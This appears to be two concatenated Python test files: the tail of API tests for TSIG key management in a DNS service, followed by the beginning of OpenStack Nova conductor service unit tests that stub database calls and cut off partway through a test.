# Create a TSIG Key
fixture = self.get_tsigkey_fixture(0)
response = self.client.post_json('/tsigkeys/', fixture)
# Check the headers are what we expect
self.assertEqual(201, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the generated values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
# Check the supplied values returned are what we expect
self.assertDictContainsSubset(fixture, response.json)
def test_create_tsigkey_validation(self):
# NOTE: The schemas should be tested separately to the API. So we
# don't need to test every variation via the API itself.
# Fetch a fixture
fixture = self.get_tsigkey_fixture(0)
# Add a junk field to the body
fixture['junk'] = 'Junk Field'
# Ensure it fails with a 400
body = fixture
self._assert_exception('invalid_object', 400, self.client.post_json,
'/tsigkeys', body)
def test_create_tsigkey_duplicate(self):
# Prepare a TSIG Key fixture
fixture = self.get_tsigkey_fixture(0)
body = fixture
# Create the first TSIG Key
response = self.client.post_json('/tsigkeys', body)
self.assertEqual(201, response.status_int)
self._assert_exception('duplicate_tsigkey', 409,
self.client.post_json, '/tsigkeys', body)
def test_get_tsigkeys(self):
response = self.client.get('/tsigkeys/')
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('tsigkeys', response.json)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# We should start with 0 tsigkeys
self.assertEqual(0, len(response.json['tsigkeys']))
data = [self.create_tsigkey(name='tsigkey-%s' % i)
for i in range(1, 10)]
self._assert_paging(data, '/tsigkeys', key='tsigkeys')
self._assert_invalid_paging(data, '/tsigkeys', key='tsigkeys')
@patch.object(central_service.Service, 'find_tsigkeys',
side_effect=messaging.MessagingTimeout())
def test_get_tsigkeys_timeout(self, _):
self._assert_exception('timeout', 504, self.client.get, '/tsigkeys/')
def test_get_tsigkey(self):
# Create a tsigkey
tsigkey = self.create_tsigkey()
response = self.client.get('/tsigkeys/%s' % tsigkey.id,
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the generated values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
# Check the supplied values returned are what we expect
self.assertEqual(tsigkey.name, response.json['name'])
self.assertEqual(
tsigkey.algorithm, response.json['algorithm'])
self.assertEqual(tsigkey.secret, response.json['secret'])
self.assertEqual(tsigkey.scope, response.json['scope'])
self.assertEqual(
tsigkey.resource_id, response.json['resource_id'])
def test_get_tsigkey_invalid_id(self):
self._assert_invalid_uuid(self.client.get, '/tsigkeys/%s')
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=messaging.MessagingTimeout())
def test_get_tsigkey_timeout(self, _):
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
self._assert_exception('timeout', 504, self.client.get, url,
headers={'Accept': 'application/json'})
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=exceptions.TsigKeyNotFound())
def test_get_tsigkey_missing(self, _):
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
self._assert_exception('tsigkey_not_found', 404, self.client.get, url,
headers={'Accept': 'application/json'})
def test_update_tsigkey(self):
# Create a TSIG Key
tsigkey = self.create_tsigkey()
# Prepare an update body
body = {'secret': 'prefix-%s' % tsigkey.secret}
response = self.client.patch_json('/tsigkeys/%s' % tsigkey.id, body)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIsNotNone(response.json['updated_at'])
self.assertEqual('prefix-%s' % tsigkey['secret'],
response.json['secret'])
def test_update_tsigkey_invalid_id(self):
self._assert_invalid_uuid(self.client.patch_json, '/tsigkeys/%s')
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=exceptions.DuplicateTsigKey())
def test_update_tsigkey_duplicate(self, _):
# Prepare an update body
body = {'name': 'AnyOldName'}
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
# Ensure it fails with a 409
self._assert_exception('duplicate_tsigkey', 409,
self.client.patch_json, url, body)
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=messaging.MessagingTimeout())
def test_update_tsigkey_timeout(self, _):
# Prepare an update body
body = {'name': 'AnyOldName'}
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
# Ensure it fails with a 504
self._assert_exception('timeout', 504, self.client.patch_json,
url, body)
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=exceptions.TsigKeyNotFound())
def test_update_tsigkey_missing(self, _):
# Prepare an update body
body = {'name': 'AnyOldName'}
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
# Ensure it fails with a 404
self._assert_exception('tsigkey_not_found', 404,
self.client.patch_json, url, body)
def test_delete_tsigkey(self):
tsigkey = self.create_tsigkey()
self.client.delete('/tsigkeys/%s' % tsigkey['id'], status=204)
def test_delete_tsigkey_invalid_id(self):
self._assert_invalid_uuid(self.client.delete, '/tsigkeys/%s')
@patch.object(central_service.Service, 'delete_tsigkey',
side_effect=messaging.MessagingTimeout())
def test_delete_tsigkey_timeout(self, _):
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
self._assert_exception('timeout', 504, self.client.delete, url)
@patch.object(central_service.Service, 'delete_tsigkey',
side_effect=exceptions.TsigKeyNotFound())
def test_delete_tsigkey_missing(self, _):
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
self._assert_exception('tsigkey_not_found', 404, self.client.delete,
url)
|
|
# Copyright 2012 IBM Corp.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for the conductor service."""
import contextlib
import mock
import mox
from oslo.config import cfg
from oslo import messaging
from oslo.serialization import jsonutils
from oslo.utils import timeutils
from nova.api.ec2 import ec2utils
from nova.compute import arch
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import conductor
from nova.conductor import api as conductor_api
from nova.conductor import manager as conductor_manager
from nova.conductor import rpcapi as conductor_rpcapi
from nova.conductor.tasks import live_migrate
from nova import context
from nova import db
from nova.db.sqlalchemy import models
from nova import exception as exc
from nova import notifications
from nova import objects
from nova.objects import base as obj_base
from nova.objects import block_device as block_device_obj
from nova.objects import fields
from nova.objects import quotas as quotas_obj
from nova import quota
from nova import rpc
from nova.scheduler import driver as scheduler_driver
from nova.scheduler import utils as scheduler_utils
from nova import test
from nova.tests import cast_as_call
from nova.tests.compute import test_compute
from nova.tests import fake_block_device
from nova.tests import fake_instance
from nova.tests import fake_notifier
from nova.tests import fake_server_actions
from nova.tests import fake_utils
from nova import utils
CONF = cfg.CONF
CONF.import_opt('report_interval', 'nova.service')
FAKE_IMAGE_REF = 'fake-image-ref'
class FakeContext(context.RequestContext):
def elevated(self):
"""Return a consistent elevated context so we can detect it."""
if not hasattr(self, '_elevated'):
self._elevated = super(FakeContext, self).elevated()
return self._elevated
class _BaseTestCase(object):
def setUp(self):
super(_BaseTestCase, self).setUp()
self.db = None
self.user_id = 'fake'
self.project_id = 'fake'
self.context = FakeContext(self.user_id, self.project_id)
fake_notifier.stub_notifier(self.stubs)
self.addCleanup(fake_notifier.reset)
def fake_deserialize_context(serializer, ctxt_dict):
self.assertEqual(self.context.user_id, ctxt_dict['user_id'])
self.assertEqual(self.context.project_id, ctxt_dict['project_id'])
return self.context
self.stubs.Set(rpc.RequestContextSerializer, 'deserialize_context',
fake_deserialize_context)
fake_utils.stub_out_utils_spawn_n(self.stubs)
def _create_fake_instance(self, params=None, type_name='m1.tiny'):
if not params:
params = {}
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['image_ref'] = FAKE_IMAGE_REF
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['host'] = 'fake_host'
type_id = flavors.get_flavor_by_name(type_name)['id']
inst['instance_type_id'] = type_id
inst['ami_launch_index'] = 0
inst['memory_mb'] = 0
inst['vcpus'] = 0
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['architecture'] = arch.X86_64
inst['os_type'] = 'Linux'
inst['availability_zone'] = 'fake-az'
inst.update(params)
return db.instance_create(self.context, inst)
def _do_update(self, instance_uuid, **updates):
return self.conductor.instance_update(self.context, instance_uuid,
updates, None)
def test_instance_update(self):
instance = self._create_fake_instance()
new_inst = self._do_update(instance['uuid'],
vm_state=vm_states.STOPPED)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.STOPPED)
self.assertEqual(new_inst['vm_state'], instance['vm_state'])
def test_instance_update_invalid_key(self):
# NOTE(danms): the real DB API call ignores invalid keys
if self.db is None:
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(KeyError,
self._do_update, 'any-uuid', foobar=1)
def test_migration_get_in_progress_by_host_and_node(self):
self.mox.StubOutWithMock(db,
'migration_get_in_progress_by_host_and_node')
db.migration_get_in_progress_by_host_and_node(
self.context, 'fake-host', 'fake-node').AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.migration_get_in_progress_by_host_and_node(
self.context, 'fake-host', 'fake-node')
self.assertEqual(result, 'fake-result')
def test_aggregate_metadata_get_by_host(self):
self.mox.StubOutWithMock(db, 'aggregate_metadata_get_by_host')
db.aggregate_metadata_get_by_host(self.context, 'host',
'key').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.aggregate_metadata_get_by_host(self.context,
'host', 'key')
self.assertEqual(result, 'result')
def test_bw_usage_update(self):
self.mox.StubOutWithMock(db, 'bw_usage_update')
self.mox.StubOutWithMock(db, 'bw_usage_get')
update_args = (self.context, 'uuid', 'mac', 0, 10, 20, 5, 10, 20)
get_args = (self.context, 'uuid', 0, 'mac')
db.bw_usage_update(*update_args, update_cells=True)
db.bw_usage_get(*get_args).AndReturn('foo')
self.mox.ReplayAll()
result = self.conductor.bw_usage_update(*update_args,
update_cells=True)
self.assertEqual(result, 'foo')
def test_provider_fw_rule_get_all(self):
fake_rules = ['a', 'b', 'c']
self.mox.StubOutWithMock(db, 'provider_fw_rule_get_all')
db.provider_fw_rule_get_all(self.context).AndReturn(fake_rules)
self.mox.ReplayAll()
result = self.conductor.provider_fw_rule_get_all(self.context)
self.assertEqual(result, fake_rules)
def test_block_device_mapping_get_all_by_instance(self):
fake_inst = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db,
'block_device_mapping_get_all_by_instance')
db.block_device_mapping_get_all_by_instance(
self.context, fake_inst['uuid']).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.block_device_mapping_get_all_by_instance(
self.context, fake_inst, legacy=False)
self.assertEqual(result, 'fake-result')
def test_vol_usage_update(self):
self.mox.StubOutWithMock(db, 'vol_usage_update')
self.mox.StubOutWithMock(compute_utils, 'usage_volume_info')
fake_inst = {'uuid': 'fake-uuid',
'project_id': 'fake-project',
'user_id': 'fake-user',
'availability_zone': 'fake-az',
}
db.vol_usage_update(self.context, 'fake-vol', 22, 33, 44, 55,
fake_inst['uuid'],
fake_inst['project_id'],
fake_inst['user_id'],
fake_inst['availability_zone'],
False).AndReturn('fake-usage')
compute_utils.usage_volume_info('fake-usage').AndReturn('fake-info')
self.mox.ReplayAll()
self.conductor.vol_usage_update(self.context, 'fake-vol',
22, 33, 44, 55, fake_inst, None, False)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('conductor.%s' % self.conductor_manager.host,
msg.publisher_id)
self.assertEqual('volume.usage', msg.event_type)
self.assertEqual('INFO', msg.priority)
self.assertEqual('fake-info', msg.payload)
def test_compute_node_create(self):
self.mox.StubOutWithMock(db, 'compute_node_create')
db.compute_node_create(self.context, 'fake-values').AndReturn(
'fake-result')
self.mox.ReplayAll()
result = self.conductor.compute_node_create(self.context,
'fake-values')
self.assertEqual(result, 'fake-result')
def test_compute_node_update(self):
node = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'compute_node_update')
db.compute_node_update(self.context, node['id'], {'fake': 'values'}).\
AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.compute_node_update(self.context, node,
{'fake': 'values'})
self.assertEqual(result, 'fake-result')
def test_compute_node_delete(self):
node = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'compute_node_delete')
db.compute_node_delete(self.context, node['id']).AndReturn(None)
self.mox.ReplayAll()
result = self.conductor.compute_node_delete(self.context, node)
self.assertIsNone(result)
def test_task_log_get(self):
self.mox.StubOutWithMock(db, 'task_log_get')
db.task_log_get(self.context, 'task', 'begin', 'end', 'host',
'state').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_get(self.context, 'task', 'begin',
'end', 'host', 'state')
self.assertEqual(result, 'result')
def test_task_log_get_with_no_state(self):
self.mox.StubOutWithMock(db, 'task_log_get')
db.task_log_get(self.context, 'task', 'begin', 'end',
'host', None).AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_get(self.context, 'task', 'begin',
'end', 'host', None)
self.assertEqual(result, 'result')
def test_task_log_begin_task(self):
self.mox.StubOutWithMock(db, 'task_log_begin_task')
db.task_log_begin_task(self.context.elevated(), 'task', 'begin',
'end', 'host', 'items',
'message').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_begin_task(
self.context, 'task', 'begin', 'end', 'host', 'items', 'message')
self.assertEqual(result, 'result')
def test_task_log_end_task(self):
self.mox.StubOutWithMock(db, 'task_log_end_task')
db.task_log_end_task(self.context.elevated(), 'task', 'begin', 'end',
'host', 'errors', 'message').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_end_task(
self.context, 'task', 'begin', 'end', 'host', 'errors', 'message')
self.assertEqual(result, 'result')
def test_notify_usage_exists(self):
info = {
'audit_period_beginning': 'start',
'audit_period_ending': 'end',
'bandwidth': 'bw_usage',
'image_meta': {},
'extra': 'info',
}
instance = {
'system_metadata': [],
}
self.mox.StubOutWithMock(notifications, 'audit_period_bounds')
self.mox.StubOutWithMock(notifications, 'bandwidth_usage')
self.mox.StubOutWithMock(compute_utils, 'notify_about_instance_usage')
notifications.audit_period_bounds(False).AndReturn(('start', 'end'))
notifications.bandwidth_usage(instance, 'start', True).AndReturn(
'bw_usage')
notifier = self.conductor_manager.notifier
compute_utils.notify_about_instance_usage(notifier,
self.context, instance,
'exists',
system_metadata={},
extra_usage_info=info)
self.mox.ReplayAll()
self.conductor.notify_usage_exists(self.context, instance, False, True,
system_metadata={},
extra_usage_info=dict(extra='info'))
def test_security_groups_trigger_members_refresh(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_members_refresh')
self.conductor_manager.security_group_api.trigger_members_refresh(
self.context, [1, 2, 3])
self.mox.ReplayAll()
self.conductor.security_groups_trigger_members_refresh(self.context,
[1, 2, 3])
def test_get_ec2_ids(self):
expected = {
'instance-id': 'ec2-inst-id',
'ami-id': 'ec2-ami-id',
'kernel-id': 'ami-kernel-ec2-kernelid',
'ramdisk-id': 'ami-ramdisk-ec2-ramdiskid',
}
inst = {
'uuid': 'fake-uuid',
'kernel_id': 'ec2-kernelid',
'ramdisk_id': 'ec2-ramdiskid',
'image_ref': 'fake-image',
}
self.mox.StubOutWithMock(ec2utils, 'id_to_ec2_inst_id')
self.mox.StubOutWithMock(ec2utils, 'glance_id_to_ec2_id')
self.mox.StubOutWithMock(ec2utils, 'image_type')
ec2utils.id_to_ec2_inst_id(inst['uuid']).AndReturn(
expected['instance-id'])
ec2utils.glance_id_to_ec2_id(self.context,
inst['image_ref']).AndReturn(
expected['ami-id'])
for image_type in ['kernel', 'ramdisk']:
image_id = inst['%s_id' % image_type]
ec2utils.image_type(image_type).AndReturn('ami-' + image_type)
ec2utils.glance_id_to_ec2_id(self.context, image_id,
'ami-' + image_type).AndReturn(
'ami-%s-ec2-%sid' % (image_type, image_type))
self.mox.ReplayAll()
result = self.conductor.get_ec2_ids(self.context, inst)
self.assertEqual(result, expected)
class ConductorTestCase(_BaseTestCase, test.TestCase):
"""Conductor Manager Tests."""
def setUp(self):
super(ConductorTestCase, self).setUp()
self.conductor = conductor_manager.ConductorManager()
self.conductor_manager = self.conductor
def test_instance_get_by_uuid(self):
orig_instance = self._create_fake_instance()
copy_instance = self.conductor.instance_get_by_uuid(
self.context, orig_instance['uuid'], None)
self.assertEqual(orig_instance['name'],
copy_instance['name'])
def test_block_device_mapping_update_or_create(self):
fake_bdm = {'id': 1, 'device_name': 'foo',
'source_type': 'volume', 'volume_id': 'fake-vol-id',
'destination_type': 'volume'}
fake_bdm = fake_block_device.FakeDbBlockDeviceDict(fake_bdm)
fake_bdm2 = {'id': 1, 'device_name': 'foo2',
'source_type': 'volume', 'volume_id': 'fake-vol-id',
'destination_type': 'volume'}
fake_bdm2 = fake_block_device.FakeDbBlockDeviceDict(fake_bdm2)
cells_rpcapi = self.conductor.cells_rpcapi
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(cells_rpcapi,
'bdm_update_or_create_at_top')
db.block_device_mapping_create(self.context,
fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(
self.context, mox.IsA(block_device_obj.BlockDeviceMapping),
create=True)
db.block_device_mapping_update(self.context, fake_bdm['id'],
fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(
self.context, mox.IsA(block_device_obj.BlockDeviceMapping),
create=False)
self.mox.ReplayAll()
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=True)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=False)
def test_instance_get_all_by_filters(self):
filters = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None, use_slave=False)
self.mox.ReplayAll()
self.conductor.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
None, False)
def test_instance_get_all_by_filters_use_slave(self):
filters = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None, use_slave=True)
self.mox.ReplayAll()
self.conductor.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None,
use_slave=True)
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
db.instance_get_all_by_host(self.context.elevated(),
'host', None).AndReturn('result')
db.instance_get_all_by_host_and_node(self.context.elevated(), 'host',
'node').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.instance_get_all_by_host(self.context, 'host',
None, None)
self.assertEqual(result, 'result')
result = self.conductor.instance_get_all_by_host(self.context, 'host',
'node', None)
self.assertEqual(result, 'result')
def _test_stubbed(self, name, dbargs, condargs,
db_result_listified=False, db_exception=None):
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
else:
getattr(db, name)(self.context, *dbargs).AndReturn('fake-result')
self.mox.ReplayAll()
if db_exception:
self.assertRaises(messaging.ExpectedException,
self.conductor.service_get_all_by,
self.context, **condargs)
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(db_exception.__class__,
self.conductor.service_get_all_by,
self.context, **condargs)
else:
result = self.conductor.service_get_all_by(self.context,
**condargs)
if db_result_listified:
self.assertEqual(['fake-result'], result)
else:
self.assertEqual('fake-result', result)
def test_service_get_all(self):
self._test_stubbed('service_get_all', (),
dict(host=None, topic=None, binary=None))
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic',
('host', 'topic'),
dict(topic='topic', host='host', binary=None))
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic',
('topic',),
dict(topic='topic', host=None, binary=None))
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host',
('host',),
dict(host='host', topic=None, binary=None))
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host', binary=None),
db_result_listified=True)
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary', topic=None))
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host', binary=None),
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary', topic=None),
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'args')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', ['args'])
def _test_object_action(self, is_classmethod, raise_exception):
class TestObject(obj_base.NovaObject):
def foo(self, context, raise_exception=False):
if raise_exception:
raise Exception('test')
else:
return 'test'
@classmethod
def bar(cls, context, raise_exception=False):
if raise_exception:
raise Exception('test')
else:
return 'test'
obj = TestObject()
if is_classmethod:
result = self.conductor.object_class_action(
self.context, TestObject.obj_name(), 'bar', '1.0',
tuple(), {'raise_exception': raise_exception})
else:
updates, result = self.conductor.object_action(
self.context, obj, 'foo', tuple(),
{'raise_exception': raise_exception})
self.assertEqual('test', result)
def test_object_action(self):
self._test_object_action(False, False)
def test_object_action_on_raise(self):
self.assertRaises(messaging.ExpectedException,
self._test_object_action, False, True)
def test_object_class_action(self):
self._test_object_action(True, False)
def test_object_class_action_on_raise(self):
self.assertRaises(messaging.ExpectedException,
self._test_object_action, True, True)
def test_object_action_copies_object(self):
class TestObject(obj_base.NovaObject):
fields = {'dict': fields.DictOfStringsField()}
def touch_dict(self, context):
self.dict['foo'] = 'bar'
self.obj_reset_changes()
obj = TestObject()
obj.dict = {}
obj.obj_reset_changes()
updates, result = self.conductor.object_action(
self.context, obj, 'touch_dict', tuple(), {})
# NOTE(danms): If conductor did not properly copy the object, then
# the new and reference copies of the nested dict object will be
# the same, and thus 'dict' will not be reported as changed
self.assertIn('dict', updates)
self.assertEqual({'foo': 'bar'}, updates['dict'])
def _test_expected_exceptions(self, db_method, conductor_method, errors,
*args, **kwargs):
# Tests that expected exceptions are handled properly.
for error in errors:
with mock.patch.object(db, db_method, side_effect=error):
self.assertRaises(messaging.ExpectedException,
conductor_method,
self.context, *args, **kwargs)
def test_action_event_start_expected_exceptions(self):
error = exc.InstanceActionNotFound(request_id='1', instance_uuid='2')
self._test_expected_exceptions(
'action_event_start', self.conductor.action_event_start, [error],
{'foo': 'bar'})
def test_action_event_finish_expected_exceptions(self):
errors = (exc.InstanceActionNotFound(request_id='1',
instance_uuid='2'),
exc.InstanceActionEventNotFound(event='1', action_id='2'))
self._test_expected_exceptions(
'action_event_finish', self.conductor.action_event_finish,
errors, {'foo': 'bar'})
def test_instance_update_expected_exceptions(self):
errors = (exc.InvalidUUID(uuid='foo'),
exc.InstanceNotFound(instance_id=1),
exc.UnexpectedTaskStateError(expected='foo',
actual='bar'))
self._test_expected_exceptions(
'instance_update', self.conductor.instance_update,
errors, None, {'foo': 'bar'}, None)
def test_instance_get_by_uuid_expected_exceptions(self):
error = exc.InstanceNotFound(instance_id=1)
self._test_expected_exceptions(
'instance_get_by_uuid', self.conductor.instance_get_by_uuid,
[error], None, [])
def test_aggregate_host_add_expected_exceptions(self):
error = exc.AggregateHostExists(aggregate_id=1, host='foo')
self._test_expected_exceptions(
'aggregate_host_add', self.conductor.aggregate_host_add,
[error], {'id': 1}, None)
def test_aggregate_host_delete_expected_exceptions(self):
error = exc.AggregateHostNotFound(aggregate_id=1, host='foo')
self._test_expected_exceptions(
'aggregate_host_delete', self.conductor.aggregate_host_delete,
[error], {'id': 1}, None)
def test_service_update_expected_exceptions(self):
error = exc.ServiceNotFound(service_id=1)
self._test_expected_exceptions(
'service_update',
self.conductor.service_update,
[error], {'id': 1}, None)
def test_service_destroy_expected_exceptions(self):
error = exc.ServiceNotFound(service_id=1)
self._test_expected_exceptions(
'service_destroy',
self.conductor.service_destroy,
[error], 1)
def _setup_aggregate_with_host(self):
aggregate_ref = db.aggregate_create(self.context.elevated(),
{'name': 'foo'}, metadata={'availability_zone': 'foo'})
self.conductor.aggregate_host_add(self.context, aggregate_ref, 'bar')
aggregate_ref = db.aggregate_get(self.context.elevated(),
aggregate_ref['id'])
return aggregate_ref
def test_aggregate_host_add(self):
aggregate_ref = self._setup_aggregate_with_host()
self.assertIn('bar', aggregate_ref['hosts'])
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_aggregate_host_delete(self):
aggregate_ref = self._setup_aggregate_with_host()
self.conductor.aggregate_host_delete(self.context, aggregate_ref,
'bar')
aggregate_ref = db.aggregate_get(self.context.elevated(),
aggregate_ref['id'])
self.assertNotIn('bar', aggregate_ref['hosts'])
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_network_migrate_instance_start(self):
self.mox.StubOutWithMock(self.conductor_manager.network_api,
'migrate_instance_start')
self.conductor_manager.network_api.migrate_instance_start(self.context,
'instance',
'migration')
self.mox.ReplayAll()
self.conductor.network_migrate_instance_start(self.context,
'instance',
'migration')
def test_network_migrate_instance_finish(self):
self.mox.StubOutWithMock(self.conductor_manager.network_api,
'migrate_instance_finish')
self.conductor_manager.network_api.migrate_instance_finish(
self.context, 'instance', 'migration')
self.mox.ReplayAll()
self.conductor.network_migrate_instance_finish(self.context,
'instance',
'migration')
def test_instance_destroy(self):
self.mox.StubOutWithMock(db, 'instance_destroy')
db.instance_destroy(self.context, 'fake-uuid').AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_destroy(self.context,
{'uuid': 'fake-uuid'})
self.assertEqual(result, 'fake-result')
def test_compute_unrescue(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api,
'unrescue')
self.conductor_manager.compute_api.unrescue(self.context, 'instance')
self.mox.ReplayAll()
self.conductor.compute_unrescue(self.context, 'instance')
def test_instance_get_active_by_window_joined(self):
self.mox.StubOutWithMock(db, 'instance_get_active_by_window_joined')
db.instance_get_active_by_window_joined(self.context, 'fake-begin',
'fake-end', 'fake-proj',
'fake-host')
self.mox.ReplayAll()
self.conductor.instance_get_active_by_window_joined(
self.context, 'fake-begin', 'fake-end', 'fake-proj', 'fake-host')
def test_instance_fault_create(self):
self.mox.StubOutWithMock(db, 'instance_fault_create')
db.instance_fault_create(self.context, 'fake-values').AndReturn(
'fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_fault_create(self.context,
'fake-values')
self.assertEqual(result, 'fake-result')
def test_action_event_start(self):
self.mox.StubOutWithMock(db, 'action_event_start')
db.action_event_start(self.context, mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.action_event_start(self.context, {})
def test_action_event_finish(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
db.action_event_finish(self.context, mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.action_event_finish(self.context, {})
def test_agent_build_get_by_triple(self):
self.mox.StubOutWithMock(db, 'agent_build_get_by_triple')
db.agent_build_get_by_triple(self.context, 'fake-hv', 'fake-os',
'fake-arch').AndReturn('it worked')
self.mox.ReplayAll()
result = self.conductor.agent_build_get_by_triple(self.context,
'fake-hv',
'fake-os',
'fake-arch')
self.assertEqual(result, 'it worked')
class ConductorRPCAPITestCase(_BaseTestCase, test.TestCase):
"""Conductor RPC API Tests."""
def setUp(self):
super(ConductorRPCAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor_manager = self.conductor_service.manager
self.conductor = conductor_rpcapi.ConductorAPI()
def test_block_device_mapping_update_or_create(self):
fake_bdm = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(block_device_obj.BlockDeviceMapping,
'_from_db_object')
db.block_device_mapping_create(self.context, fake_bdm)
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
db.block_device_mapping_update(self.context, fake_bdm['id'], fake_bdm)
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
db.block_device_mapping_update_or_create(self.context, fake_bdm)
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
